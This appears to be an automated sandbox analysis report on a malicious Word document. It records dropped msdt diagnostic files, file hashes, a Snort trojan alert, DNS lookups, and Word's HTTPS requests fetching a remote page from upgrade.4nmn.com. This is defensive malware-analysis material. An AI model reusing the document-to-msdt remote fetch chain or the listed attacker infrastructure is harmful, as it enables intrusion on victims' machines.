                                                                                                                                                                Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.mui

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10752
                                                                                                                                                                Entropy (8bit):3.517898352371806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\result\results.xsl

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48956
                                                                                                                                                                Entropy (8bit):5.103589775370961
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:Microsoft OOXML
                                                                                                                                                                Entropy (8bit):7.762329445476857
                                                                                                                                                                TrID:
                                                                                                                                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                File name:WF0SlQWKr1.docx
                                                                                                                                                                File size:12519
                                                                                                                                                                MD5:783f850d06c9f1286eb9b1bda0af0bce
                                                                                                                                                                SHA1:08011884c9bed126b4cfbadad4a4be5063805230
                                                                                                                                                                SHA256:211a1f74eea68ebe7178d90f0df0446a87cdda865145c397b7a32e253086139e
                                                                                                                                                                SHA512:fcab796a185f90db166c6fc335dd54db3b51856b3daa46905fdfa5641ced9140ae18cf601e7b93a511c2d77b94e21bdddc7b2e23a49d358fb3960be781070a6f
                                                                                                                                                                SSDEEP:384:Fkv41E49wKxhpp+gX6eILI7RMobB/P/sQGwZRB98PG0S:evyE4aWfKetlV9PDXgA
                                                                                                                                                                TLSH:1D428D33C7074835D0ABBAB870D95483EA75CD45E9D2A09F3A94E2D04CE26EB1B0778D
                                                                                                                                                                File Content Preview:PK..........!....lR... .......[Content_Types].xml...N.1...M|.Mo.[......?.J">@ig...6.....e......l..9.|.d:..+.-!......'2.:..g.x.<voD...Q.x(..P......&.f..X.9Q.....*.y...R.T).c...............S.j.1..C.....5.nH.8..].Xg.B...V.u...KJw...r..s....B.L.+...t.|5....*.

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                Network Behavior

                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                116.203.251.9192.168.2.3443497452025011 06/20/22-08:29:56.120422TCP2025011ET TROJAN Powershell commands sent B64 244349745116.203.251.9192.168.2.3

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jun 20, 2022 08:29:52.199393988 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.199448109 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.199541092 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.201288939 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.201313972 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.276954889 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.277107000 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.301300049 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.301326990 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.301868916 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.308511972 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.335254908 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.335345984 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.335418940 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.335467100 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.335494041 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.335509062 CEST49734443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.335520029 CEST44349734116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.564659119 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.564718962 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.564810038 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.567034006 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.567063093 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.623687983 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.631222963 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.631275892 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.632443905 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.632456064 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.671315908 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.671437979 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.671528101 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.690000057 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.690041065 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:52.690062046 CEST49735443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:52.690080881 CEST44349735116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.742680073 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.742734909 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.742842913 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.743011951 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.743026972 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.805716038 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.806166887 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.806202888 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.807419062 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.807430983 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.853537083 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.853630066 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.853696108 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.853740931 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.853758097 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.853777885 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.853790045 CEST49744443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:55.853797913 CEST44349744116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.014554024 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.014609098 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.014718056 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.015355110 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.015383959 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.074003935 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.074116945 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.083441019 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.083458900 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.083966970 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.084058046 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.084482908 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.120297909 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.120349884 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.120434999 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.120451927 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.120518923 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.120526075 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.120532036 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.121470928 CEST49745443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.121501923 CEST44349745116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.372096062 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.372148037 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:56.372262001 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.372560978 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:56.372586966 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.450944901 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.451168060 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.451503992 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.451523066 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.454102993 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.454133987 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.498409986 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.498507023 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.498698950 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.498743057 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.498764038 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.498790026 CEST44349746116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.498806953 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.498889923 CEST49746443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.678199053 CEST49747443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.678247929 CEST44349747116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.678327084 CEST49747443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.678642988 CEST49747443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.678651094 CEST44349747116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.741292000 CEST44349747116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.741420984 CEST49747443192.168.2.3116.203.251.9

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jun 20, 2022 08:29:52.110529900 CEST5592353192.168.2.38.8.8.8
                                                                                                                                                                Jun 20, 2022 08:29:52.183651924 CEST53559238.8.8.8192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:55.947717905 CEST5811653192.168.2.38.8.8.8
                                                                                                                                                                Jun 20, 2022 08:29:56.012845039 CEST53581168.8.8.8192.168.2.3

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Jun 20, 2022 08:29:52.110529900 CEST192.168.2.38.8.8.80x72f4Standard query (0)upgrade.4nmn.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 20, 2022 08:29:55.947717905 CEST192.168.2.38.8.8.80xf8eaStandard query (0)upgrade.4nmn.comA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Jun 20, 2022 08:29:52.183651924 CEST8.8.8.8192.168.2.30x72f4No error (0)upgrade.4nmn.com116.203.251.9A (IP address)IN (0x0001)
                                                                                                                                                                Jun 20, 2022 08:29:56.012845039 CEST8.8.8.8192.168.2.30xf8eaNo error (0)upgrade.4nmn.com116.203.251.9A (IP address)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • upgrade.4nmn.com

                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.349734116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:52 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                User-Agent: Microsoft Office Word 2014
                                                                                                                                                                X-Office-Major-Version: 16
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-FeatureVersion: 1
                                                                                                                                                                X-MSGETWEBURL: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                2022-06-20 06:29:52 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                Allow: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                Public: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:52 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.349735116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:52 UTC0OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                User-Agent: Microsoft Office Word 2014
                                                                                                                                                                X-Office-Major-Version: 16
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-FeatureVersion: 1
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                2022-06-20 06:29:52 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:52 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                10192.168.2.349752116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:58 UTC12OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:29:58 UTC12INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:58 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                11192.168.2.349753116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:30:02 UTC12OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:30:02 UTC12INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:30:02 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.349744116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:55 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                User-Agent: Microsoft Office Word 2014
                                                                                                                                                                X-Office-Major-Version: 16
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-FeatureVersion: 1
                                                                                                                                                                X-MSGETWEBURL: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                2022-06-20 06:29:55 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                Allow: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                Public: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:55 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                3192.168.2.349745116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:56 UTC1OUTGET /microsoft.html HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:29:56 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:55 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                2022-06-20 06:29:56 UTC1INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74
                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                4192.168.2.349746116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:57 UTC9OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:29:57 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
